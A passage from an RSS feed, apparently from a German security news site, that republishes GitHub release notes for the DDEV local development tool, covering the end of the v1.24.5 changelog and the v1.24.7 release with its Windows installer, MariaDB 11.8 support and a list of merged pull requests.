<li>fix: set <code>XDEBUG_MODE=off</code> for <code>ddev composer create-project</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3002840728" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev-intellij-plugin/issues/414" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev-intellij-plugin/issues/414/hovercard" href="https://github.com/ddev/ddev-intellij-plugin/issues/414">ddev/ddev-intellij-plugin#414</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3039300492" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7260" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7260/hovercard" href="https://github.com/ddev/ddev/pull/7260">#7260</a></li>
<li>build: remove &lt;1.24 constraint for go, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2901680865" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7057" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7057/hovercard" href="https://github.com/ddev/ddev/pull/7057">#7057</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2969419356" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7187" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7187/hovercard" href="https://github.com/ddev/ddev/pull/7187">#7187</a></li>
<li>fix: support '&gt;,x,X,*' comparisons and extended conditions in version constraint, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3040244622" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7266" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7266/hovercard" href="https://github.com/ddev/ddev/issues/7266">#7266</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3042574493" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7268" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7268/hovercard" href="https://github.com/ddev/ddev/pull/7268">#7268</a></li>
<li>fix: add warning about duplicate usage for global commands, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2343459739" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6293" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/6293/hovercard" href="https://github.com/ddev/ddev/pull/6293">#6293</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3024137058" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7238" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7238/hovercard" href="https://github.com/ddev/ddev/pull/7238">#7238</a></li>
<li>feat: update xhgui config, add link to upstream file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3039833190" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7262" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7262/hovercard" href="https://github.com/ddev/ddev/pull/7262">#7262</a></li>
<li>docs: Update Shopware quickstart with "shopware/production" instead of "shopware/production:^v6.5" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bangdinhnfq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bangdinhnfq">@bangdinhnfq</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3035016831" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7253" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7253/hovercard" href="https://github.com/ddev/ddev/pull/7253">#7253</a></li>
<li>refactor: improve <code>ddev add-on get</code> output, add warning exit code annotation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3039936305" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7263" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7263/hovercard" href="https://github.com/ddev/ddev/pull/7263">#7263</a></li>
<li>fix: Add path to docroot in wp parameters when not set, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3029006936" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7241" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7241/hovercard" href="https://github.com/ddev/ddev/issues/7241">#7241</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pfructuoso/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pfructuoso">@pfructuoso</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3030532783" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7242" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7242/hovercard" href="https://github.com/ddev/ddev/pull/7242">#7242</a></li>
<li>fix: replace broken http and https port lookup, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3033706552" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7246" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7246/hovercard" href="https://github.com/ddev/ddev/issues/7246">#7246</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3037867629" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7259" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7259/hovercard" href="https://github.com/ddev/ddev/pull/7259">#7259</a></li>
<li>docs: add ddev.com, addon registry, last commit, DeepWiki badges to README.md by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3060055575" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7285" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7285/hovercard" href="https://github.com/ddev/ddev/pull/7285">#7285</a></li>
<li>fix: make xdebug work with WSL2 mirrored mode, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3047023339" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7272" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7272/hovercard" href="https://github.com/ddev/ddev/issues/7272">#7272</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3049868682" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7277" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7277/hovercard" href="https://github.com/ddev/ddev/pull/7277">#7277</a></li>
<li>refactor: Use <code>.ddev/.env.web</code> for Craft CMS DDEV settings, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3019954269" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7233" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7233/hovercard" href="https://github.com/ddev/ddev/issues/7233">#7233</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3020659410" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7236" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7236/hovercard" href="https://github.com/ddev/ddev/pull/7236">#7236</a></li>
<li>build: add <code>make go-mod-update</code>  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3060862995" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7288" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7288/hovercard" href="https://github.com/ddev/ddev/pull/7288">#7288</a></li>
<li>build: bump docker-compose to v2.36.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3061017112" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7289" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7289/hovercard" href="https://github.com/ddev/ddev/pull/7289">#7289</a></li>
<li>docs: use <code>composer create-project</code> in Magento 2 quickstart, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3018199525" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7231" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7231/hovercard" href="https://github.com/ddev/ddev/pull/7231">#7231</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3062856366" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7292" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7292/hovercard" href="https://github.com/ddev/ddev/pull/7292">#7292</a></li>
<li>docs: update Craft CMS quickstart, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3020659410" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7236" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7236/hovercard" href="https://github.com/ddev/ddev/pull/7236">#7236</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/timkelty/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/timkelty">@timkelty</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3049408777" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7274" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7274/hovercard" href="https://github.com/ddev/ddev/pull/7274">#7274</a></li>
<li>feat: restart only specified service in <code>ddev debug rebuild</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3059930956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7284" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7284/hovercard" href="https://github.com/ddev/ddev/pull/7284">#7284</a></li>
<li>build: bump images to v1.24.5 for release, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3034238073" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7250" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7250/hovercard" href="https://github.com/ddev/ddev/issues/7250">#7250</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3062512941" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7291" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7291/hovercard" href="https://github.com/ddev/ddev/pull/7291">#7291</a></li>
<li>feat: add shell completion for --service (-s) flag by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3059638031" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7283" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7283/hovercard" href="https://github.com/ddev/ddev/pull/7283">#7283</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvinhinz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvinhinz">@marvinhinz</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2956964244" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7166" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7166/hovercard" href="https://github.com/ddev/ddev/pull/7166">#7166</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barbieswimcrew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barbieswimcrew">@barbieswimcrew</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2898378404" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7050" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7050/hovercard" href="https://github.com/ddev/ddev/pull/7050">#7050</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colans">@colans</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2897793508" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7049" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7049/hovercard" href="https://github.com/ddev/ddev/pull/7049">#7049</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jgonyea/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jgonyea">@jgonyea</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2986705751" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7197" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7197/hovercard" href="https://github.com/ddev/ddev/pull/7197">#7197</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3003476644" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7216" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7216/hovercard" href="https://github.com/ddev/ddev/pull/7216">#7216</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nmangold/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nmangold">@nmangold</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3023575382" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7237" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7237/hovercard" href="https://github.com/ddev/ddev/pull/7237">#7237</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bangdinhnfq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bangdinhnfq">@bangdinhnfq</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3035016831" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7253" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7253/hovercard" href="https://github.com/ddev/ddev/pull/7253">#7253</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pfructuoso/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pfructuoso">@pfructuoso</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3030532783" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7242" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7242/hovercard" href="https://github.com/ddev/ddev/pull/7242">#7242</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.4...v1.24.5"><tt>v1.24.4...v1.24.5</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.24.7: Windows Installer, MariaDB 11.8]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use apt install ddev or apt upgrade ddev see apt/yum installation
Windows and WSL2: Download the ddev_windows_amd64_installer.v1.24.7.exe; you can run i...]]></description>
<link>https://tsecurity.de/de/3497301/downloads/v1247-windows-installer-mariadb-118/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497301/downloads/v1247-windows-installer-mariadb-118/</guid>
<pubDate>Thu, 07 May 2026 22:17:26 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>apt install ddev</code> or <code>apt upgrade ddev</code> see <a href="https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://github.com/ddev/ddev/releases/download/v1.24.7/ddev_windows_amd64_installer.v1.24.7.exe">ddev_windows_amd64_installer.v1.24.7.exe</a>; you can run it for install or upgrade.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>Highlights</h2>
<ul>
<li><strong>Windows Installer</strong> handling Traditional Windows, WSL2/Docker CE, and Docker/Rancher Desktop. <a href="https://ddev.com/blog/watch-new-windows-installer" rel="nofollow">Read more, with video</a></li>
<li>Support added for <strong>MariaDB 11.8 LTS</strong>, <code>ddev config --database=mariadb:11.8</code></li>
<li>New <code>ddev-hostname</code> binary for hosts editing (with improved elevation/escalation technique) (<code>gsudo</code> is no longer required on Windows, and <code>ddev.exe</code> installation is no longer required on Windows WSL2. <a href="https://ddev.com/blog/ddev-hostname-security-improvements" rel="nofollow">Read more</a></li>
<li>New Linux <code>ddev-wsl2</code> package is built specifically for WSL2 and includes Windows-side binaries, so separate upgrading of Windows-side binaries is not needed</li>
<li><a href="https://learn.microsoft.com/en-us/windows/wsl/networking#mirrored-mode-networking" rel="nofollow">WSL2 Mirrored Mode</a> now has automated testing</li>
<li>New <a href="https://ddev.readthedocs.io/en/stable/users/usage/faq/#minimally-supported" rel="nofollow">minimally supported</a> Docker providers:
<ul>
<li><strong>Docker Desktop for Linux</strong> - has had limited manual testing only; prefer the documented <a href="https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/#linux" rel="nofollow"><code>docker-ce</code></a> installation</li>
<li><strong>Rancher Desktop for Windows</strong> - has had limited manual testing only; currently the only open-source provider on traditional Windows</li>
</ul>
</li>
<li>It's recommended to run <code>ddev delete images</code> after the upgrade</li>
</ul>
<h2>Breaking Changes</h2>
<ul>
<li>If you rely on <code>## Flags</code> annotation in custom commands, there is a change: unknown flags will no longer be parsed and will cause <code>Error: unknown flag</code> or <code>Error: unknown shorthand flag</code>. Either define <em>all</em> possible flags explicitly or remove the <code>## Flags</code> annotation.</li>
</ul>
<h2>Features</h2>
<ul>
<li>Enhanced Docker images cleanup in <code>ddev delete images</code>, <code>ddev delete</code>, <code>ddev clean</code></li>
<li>Shell completion support for flags in <code>ddev config</code> and <code>ddev config global</code></li>
<li>New <code>DDEV_USER</code> environment variable for use in custom <code>.ddev/docker-compose.*.yaml</code> files</li>
<li><code>ddev launch</code> in WSL2 works without installing <code>xdg-utils</code> (which can be safely removed on existing installations after update)</li>
<li>Support for <code>NO_COLOR</code> variable, see <a href="https://ddev.readthedocs.io/en/stable/users/extend/in-container-configuration/#using-no_color-inside-containers" rel="nofollow">Using <code>NO_COLOR</code> Inside Containers</a></li>
<li>Return real exit code from <code>ddev exec</code> and add quiet <code>-q</code> flag to it, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andreashager/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andreashager">@andreashager</a></li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>Fix <code>ddev composer create-project</code> to accept <code>stdin</code></li>
<li>Remove unused Node.js version cache in <code>ddev-global-cache</code> Docker volume, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lozcalver/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lozcalver">@lozcalver</a></li>
<li>Add overrides from all <code>.ddev/config.*.yaml</code> files to <code>.DdevProjectConfig</code> (used in Go templates, see <a href="https://github.com/ddev/ddev-platformsh/blob/main/install.yaml">example</a>)</li>
<li>Make <code>--json-output</code> / <code>-j</code> work as expected for debug/verbose output.</li>
<li>Fix issue where the <code>db</code> container couldn't restart alone when extra config was present in <code>.ddev/mysql/*.cnf</code>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/das-peter/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/das-peter">@das-peter</a></li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.3.23 and 8.4.10</li>
<li>Xdebug 3.4.4</li>
<li><code>docker-compose</code> v2.38.2</li>
<li>Update <code>debian-archive-keyring</code> for EOL database images (<code>mysql:5.5</code>, <code>mysql:5.6</code>, <code>postgres:9</code>, <code>postgres:10</code>, <code>postgres:11</code>)</li>
<li>Display user defined <code>router-compose.*.yaml</code> and <code>ssh-auth-compose.*.yaml</code> during <code>ddev start</code></li>
<li>Align Craft CMS quickstart with official docs, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AugustMiller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AugustMiller">@AugustMiller</a></li>
<li>Normalize default values in <code>ddev help config</code> and <code>ddev help config global</code></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>build: apply more staticcheck rules from golangci-lint, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2953863875" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7155" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7155/hovercard" href="https://github.com/ddev/ddev/issues/7155">#7155</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3077256350" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7317" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7317/hovercard" href="https://github.com/ddev/ddev/pull/7317">#7317</a></li>
<li>docs: trailing whitespace on template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3080487027" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7321" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7321/hovercard" href="https://github.com/ddev/ddev/pull/7321">#7321</a></li>
<li>build: update debian-archive-keyring for archived debian repos, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3079868668" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7320" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7320/hovercard" href="https://github.com/ddev/ddev/issues/7320">#7320</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3081505394" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7324" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7324/hovercard" href="https://github.com/ddev/ddev/pull/7324">#7324</a></li>
<li>docs: use latest markdownlint, update "here" links by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3083984641" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7327" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7327/hovercard" href="https://github.com/ddev/ddev/pull/7327">#7327</a></li>
<li>feat: prune orphaned Node.js versions after install, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3082516037" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7325" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7325/hovercard" href="https://github.com/ddev/ddev/issues/7325">#7325</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lozcalver/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lozcalver">@lozcalver</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3082652953" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7326" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7326/hovercard" href="https://github.com/ddev/ddev/pull/7326">#7326</a></li>
<li>docs: add tip on initial PhpStorm plugin setup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3090693268" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7331" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7331/hovercard" href="https://github.com/ddev/ddev/pull/7331">#7331</a></li>
<li>refactor: improve message about missing docroot on <code>ddev start</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3090860680" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7332" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7332/hovercard" href="https://github.com/ddev/ddev/pull/7332">#7332</a></li>
<li>docs: clarify instructions for using PhpStorm inside WSL2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pbowyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pbowyer">@pbowyer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3092806240" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7333" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7333/hovercard" href="https://github.com/ddev/ddev/pull/7333">#7333</a></li>
